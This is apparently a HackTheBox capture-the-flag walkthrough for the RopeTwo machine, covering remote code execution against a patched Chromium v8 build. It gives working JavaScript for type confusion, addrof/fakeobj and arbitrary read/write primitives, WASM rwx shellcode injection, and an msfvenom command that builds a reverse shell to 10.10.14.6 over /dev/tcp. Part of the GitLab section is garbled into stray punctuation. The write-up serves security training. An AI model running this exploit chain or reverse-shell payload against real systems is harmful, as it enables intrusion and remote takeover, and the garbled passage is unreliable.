HackTheBox. RopeTwo Walkthrough, Part 1. Chromium v8

It's time to publish my first writeup for a machine from HackTheBox.

In this article we will write an RCE exploit for a patched build of the V8 JavaScript engine, which by now is used almost everywhere.





I would like to express special gratitude to Ex0dus and my team. These people helped as much as they could, did not give up, and simply supported me.





Disclaimer


OSINT

Let's start with an nmap scan.

Besides port 22, ports 5000 and 8000 are open.

Port 5000 hosts GitLab, which greets us with a login page.

Port 8000 hosts a page about v8.





v8

The page is about running JavaScript in Chrome's engine, v8. This is not an XSS challenge.










GitLab

Before digging into v8, let's look at GitLab.

The GitLab API lets us look up users by id: %hostname%/api/v4/users/%user_id%








, " " - . , e-mail. , GitLab gravatar, md5 e-mail'a . e64c7d89f26bd1972efa854d13d7dd61



, , , e-mail admin@example.com



. , . , .





From there we go to GitHub: the v8 used by Chrome lives there, and comparing the repository's v8 with upstream shows what was changed.

The differences from stock v8 are small. Namely, two new Array builtins were added:





ArrayGetLastElement



ArraySetLastElement



The first is supposed to return the last element but reads array[len], one past the end, instead of array[len-1]. The second likewise writes to array[len]. This is essentially the oob-v8 challenge from *CTF 2019, for which plenty of writeups exist. :D





Chrome

A few words about v8 internals. Modern v8 uses pointer compression: in a 64-bit build, pointers inside the v8 heap are stored as 32-bit values (the low 32 bits of the address), and the upper 32 bits, the heap base, are kept in a register, r13 on x64 (the isolate root). v8 also JIT-compiles JavaScript.

Arrays in v8 come in several element kinds; the three that matter here are smi, double and regular. Transitions between them go one way only: from smi to double and from double to regular, never back. A regular array can hold anything (numbers, strings, objects, and so on). The element sizes differ: a smi element is 32 bits, a double element is 64 bits, and a regular element is a 32-bit compressed pointer. To look at objects inside v8, run d8 with --allow-natives-syntax and use %DebugPrint.

Every object starts with a map, which describes the object's type and layout; for arrays the map also records the elements kind and whether the array is PACKED or HOLEY. An array's length field is stored as a smi.
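As an added example (not code from the article), here is how the three element sizes just described look at the byte level under pointer compression. This is plain JavaScript runnable in Node: the helpers reinterpret bit patterns the way exploit code does, and assume a little-endian x64 target with 32-bit compressed pointers, smis shifted left by one, and the low tag bit set on heap pointers, which is how v8 encodes them.

```javascript
// Added example: smi, compressed pointer and double encodings in v8.
// Assumes little-endian x64 and v8's pointer compression (32-bit tagged slots).
const conv = new ArrayBuffer(8);
const convF64 = new Float64Array(conv);
const convU64 = new BigUint64Array(conv);

function ftoi(d) { convF64[0] = d; return convU64[0]; }              // double -> 64-bit pattern
function itof(n) { convU64[0] = BigInt.asUintN(64, n); return convF64[0]; }

// smi: the integer shifted left by one, low bit 0; 32 bits wide under compression.
function smi(n) { return BigInt.asUintN(32, BigInt(n) << 1n); }
function isSmi(tagged) { return (tagged & 1n) === 0n; }
function smiValue(tagged) { return BigInt.asIntN(32, tagged) >> 1n; }

// Heap object: the compressed address with the low bit set as a tag.
function tagPointer(addr) { return BigInt.asUintN(32, addr) | 1n; }
function isHeapObject(tagged) { return (tagged & 1n) === 1n; }

// A regular-elements slot is 4 bytes, a double slot is 8: reading a regular array
// through a double-array map yields two tagged slots per double, low slot first.
function packSlots(lo, hi) { return (BigInt.asUintN(32, hi) << 32n) | BigInt.asUintN(32, lo); }
function splitSlots(pattern) { return { lo: pattern & 0xffffffffn, hi: pattern >> 32n }; }

// Decompression: the 32-bit value is added to the heap base, whose low 32 bits
// are zero; on x64 that base lives in r13, as described above.
function decompress(isolateRoot, compressed) {
  return (isolateRoot & ~0xffffffffn) + BigInt.asUintN(32, compressed);
}

// What addrof() sees after swapping the map of [obj1, obj2]: one double whose
// halves are the two tagged slots. Each half is either a smi or a heap pointer.
function describeDoubleSlot(d) {
  const { lo, hi } = splitSlots(ftoi(d));
  const describe = (t) => isSmi(t) ? { kind: 'smi', value: smiValue(t) }
                                   : { kind: 'heap', address: t - 1n };
  return { lo: describe(lo), hi: describe(hi) };
}
```

The 32-bit variants of ftoi/itof used by the primitives later on are just splitSlots and packSlots applied to these patterns: addrof keeps the low slot, fakeobj writes an address into it.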





Another thing to keep in mind: Chrome allocates with PartitionAlloc, whereas d8 uses glibc's allocator.

This matters because the target runs d8, not Chrome. I built my own d8 on Ubuntu 18.04 to debug the exploit locally.










GetLastElement on a double array returns the map of the array itself, because the JSArray object sits right after its elements store, and SetLastElement lets us overwrite that map. That is our type confusion.





type confusion

From the type confusion we build the two standard primitives: addrof and fakeobj.

For addrof we put the object into a regular array, swap the array's map for a double-array map, and read the element back as a double: the bits of that double are the object's pointer. For fakeobj we do the reverse: write the address as a double into a double array, swap its map for the object-array map, and read the element back, which gives us a "fake" object at that address. In both cases the original map is restored afterwards.

That is not RCE yet. We still need arbitrary read and write, and a place to run shellcode.





The classic way in v8 is WASM. When a WebAssembly module is instantiated, v8 mmaps an rwx region for its compiled code. The pointer to that region sits at offset 0x68 inside the WASM instance object, so we read it out, write our shellcode into the rwx region and call the exported function.





v8 rwx

A fair objection here: "Wait, doesn't v8 no longer have an rwx region? That was fixed!" Yes, it was. But in the build used on the box the rwx WASM region is still there, and it works.





One more question: how do we read and write arbitrary 64-bit addresses from v8 when every pointer we handle is a 32-bit compressed one? Anything outside the v8 heap needs a full 64-bit pointer. Fortunately an ArrayBuffer stores its backing-store pointer as a full 64-bit value.

So we overwrite the backing store of an ArrayBuffer and read or write the target through a DataView. Since d8 is glibc-based rather than using Chrome's PartitionAlloc, libc can be reached the same way if needed.





The builtins always cast the elements store to a 64-bit FixedDoubleArray. For a double array that is fine: the OOB access reads or writes a real double one past the end.

For a regular array things are different. A two-element regular array holds 2 compressed pointers, i.e. 8 bytes, whereas two doubles take 16, so index 2 of the pretend FixedDoubleArray lies twice as far out. In general, for a regular array of length n the OOB access at index n covers 32-bit slots 2n and 2n+1 of the real FixedArray. This has to be taken into account when setting up the type confusion.





addrof

Take a two-element regular array: its valid indices are 0 and 1, and the OOB index is 2. First we read out the maps with GetLastElement, then we use SetLastElement to overwrite the map through the OOB slot, read the element as a double, and put the original map back. fakeobj works the same way in reverse.





The addrof and fakeobj primitives (the ftoi/itof conversion helpers and the setup of the helper arrays are not shown in the original; they are filled in here from the comments):

```javascript
// Conversion helpers: reinterpret a double as a BigInt and back; with bits == 32
// only the low 32 bits (one compressed pointer) are kept.
var conv_buf = new ArrayBuffer(8);
var conv_f64 = new Float64Array(conv_buf);
var conv_u64 = new BigUint64Array(conv_buf);
function ftoi(val, bits) { conv_f64[0] = val; return bits == 32 ? conv_u64[0] & 0xffffffffn : conv_u64[0]; }
function itof(val, bits) { conv_u64[0] = bits == 32 ? val & 0xffffffffn : val; return conv_f64[0]; }

// Helper arrays. GetLastElement() reads the OOB slot, which holds the array's own map.
var float_arr = [1.1, 1.2, 1.3, 1.4];
var obj_arr = [{}, {}];                   // [obj1, obj2]
var float_arr_map = float_arr.GetLastElement();
var obj_arr_map = obj_arr.GetLastElement();

function addrof(in_obj) {
  obj_arr[0] = in_obj;
  obj_arr.SetLastElement(float_arr_map); // obj_arr now looks like a double array
  let addr = obj_arr[0];                 // the pointer comes back as a double
  obj_arr.SetLastElement(obj_arr_map);   // restore the original map
  return ftoi(addr, 32);                 // low 32 bits: the compressed pointer
}

function fakeobj(addr) {
  float_arr[0] = itof(addr, 32);         // store the address as a double
  float_arr.SetLastElement(obj_arr_map); // float_arr now looks like an object array
  let fake = float_arr[0];               // the same slot comes back as an object
  float_arr.SetLastElement(float_arr_map);
  return fake;
}
```
      
      



Now for arbitrary read and write. We build a fake JSArray inside the elements of a real double array, rw_helper. Two details matter. First, the map is the first qword of the object, so rw_helper[0] holds the double-array map we read out earlier. Second, the elements pointer of a JSArray points at the FixedDoubleArray header, whose data starts 0x8 bytes later, so to make index 0 land on addr we store addr - 0x8 in the low half of the second qword and a length smi in the high half:

```javascript
// rw_helper's elements store sits right before rw_helper itself; its data begins
// 0x20 bytes before the JSArray (0x28 bytes of FixedDoubleArray minus the 8-byte header),
// so a fake object at rw_helper_addr - 0x20 uses rw_helper[0] as its map and
// rw_helper[1] as its elements pointer and length.
var rw_helper = [float_arr_map, 1.1, 2.2, 3.3];
var rw_helper_addr = addrof(rw_helper) & 0xffffffffn;

function arb_read(addr) {
  let fake = fakeobj(rw_helper_addr - 0x20n);
  // low 32 bits: elements = addr - 0x8; high 32 bits: length as a smi (0x8 tagged = 4)
  rw_helper[1] = itof((0x8n << 32n) + addr - 0x8n, 64);
  return ftoi(fake[0], 64);              // fake[0] is the 8 bytes at addr
}

function arb_write(addr, value) {
  let fake = fakeobj(rw_helper_addr - 0x20n);
  rw_helper[1] = itof((0x8n << 32n) + addr - 0x8n, 64);
  fake[0] = itof(value, 64);             // write 8 bytes at addr
}
```
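As an added example (not code from the article), here is the arithmetic behind the fake JSArray that arb_read and arb_write plant in rw_helper, with a decoder that shows which field each half of the two qwords lands in. It assumes the object layout the primitives above rely on (JSArray = map, properties, elements, length at 4 bytes each; 8-byte FixedDoubleArray header; elements store directly before the array object) and runs in plain Node without a patched d8.

```javascript
// Added example: the qwords of the fake JSArray used for arbitrary read/write.
// Offsets assume the layout described in the article; not checked against a live d8.
const FIXED_DOUBLE_ARRAY_HEADER = 0x8n;          // map + length of the elements store

function packSlots(lo, hi) { return (BigInt.asUintN(32, hi) << 32n) | BigInt.asUintN(32, lo); }
function smi(n) { return BigInt.asUintN(32, BigInt(n) << 1n); }

// qword 0: map | properties (copied from a real double array, as rw_helper[0]);
// qword 1: elements | length. elements is set 8 bytes before the target so that
// index 0 of the fake array lies exactly on the target address.
function fakeArrayQwords(mapAndProps, target, length) {
  return [mapAndProps, packSlots(target - FIXED_DOUBLE_ARRAY_HEADER, smi(length))];
}

// Which address a given index of the fake array reaches.
function fakeIndexAddress(q1, index) {
  const elements = q1 & 0xffffffffn;
  return elements + FIXED_DOUBLE_ARRAY_HEADER + BigInt(index) * 8n;
}

function decodeFakeArray(q0, q1) {
  return {
    map: q0 & 0xffffffffn,
    properties: q0 >> 32n,
    elements: q1 & 0xffffffffn,
    length: Number(BigInt.asIntN(32, q1 >> 32n) >> 1n),
  };
}

// Where fakeobj() must point: the elements data of rw_helper starts
// numDoubles * 8 bytes before the JSArray (0x20 for the four doubles used above),
// because the FixedDoubleArray directly precedes the array object.
function fakeObjectAddress(rwHelperAddr, numDoubles = 4) {
  return rwHelperAddr - BigInt(numDoubles) * 8n;
}
```

fakeArrayQwords(m, addr, 4)[1] is the same value as the article's (0x8n << 32n) + addr - 0x8n: the 0x8 in the high half is the smi for length 4, and the -0x8 compensates for the elements header. The length only needs to be large enough to keep index 0 in bounds; picking the same smi as the real helper array keeps the fake object indistinguishable from a four-element double array.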
      
      



Now we need shellcode: a reverse shell generated with msfvenom. The num format prints the bytes as a comma-separated list that can be pasted straight into a JavaScript array.

```shell
msfvenom -p linux/x64/exec -f num CMD='bash -c "bash -i >& /dev/tcp/10.10.14.6/1337 0>&1"'
```
      
      







The shellcode is written into the rwx region and executed.

Start a netcat listener, run the exploit, and we get a shell:

After that I switched to ssh.
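As an added example (not code from the article), here is the WebAssembly setup that gives v8 an rwx region, together with a helper that cuts shellcode into the 8-byte little-endian words an arbitrary-write primitive takes, and a stand-in write loop. The wasm bytes are the standard minimal module exporting main() (it returns 42); the shellcode is a constructed placeholder (nop; nop; nop; ret), not the msfvenom payload, so paste the output of the command above in its place. Runs in plain Node.

```javascript
// Added example: WASM instance for an rwx region + shellcode -> qword packing.
// Standard minimal module: exports "memory" and "main" (main returns 42).
const wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);

function makeWasmInstance() {
  return new WebAssembly.Instance(new WebAssembly.Module(wasmCode), {});
}

// Split shellcode into qwords, padding the tail with NOPs (0x90), which are
// harmless if execution runs past the end of the payload.
function shellcodeToQwords(bytes) {
  const words = [];
  for (let i = 0; i < bytes.length; i += 8) {
    let q = 0n;
    for (let j = 0; j < 8; j++) {
      const b = i + j < bytes.length ? bytes[i + j] : 0x90;
      q |= BigInt(b) << BigInt(8 * j);             // little-endian: first byte lowest
    }
    words.push(q);
  }
  return words;
}

// Stand-in for the write loop: `page` plays the rwx region and a DataView store
// plays the 64-bit write primitive (in the exploit: the ArrayBuffer/DataView one).
function writeShellcode(page, base, bytes) {
  const view = new DataView(page.buffer, page.byteOffset, page.byteLength);
  shellcodeToQwords(bytes).forEach((q, i) => view.setBigUint64(base + i * 8, q, true));
  return page;
}

// Constructed placeholder payload: nop; nop; nop; ret (x86-64).
const sampleShellcode = [0x90, 0x90, 0x90, 0xc3];
```

In the real exploit the flow is: instance = makeWasmInstance(); read the rwx pointer at offset 0x68 of addrof(instance) with the 64-bit read; write each qword from shellcodeToQwords(payload) there; then call instance.exports.main(), which jumps into the region.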





All in all, this part took me 9 days.







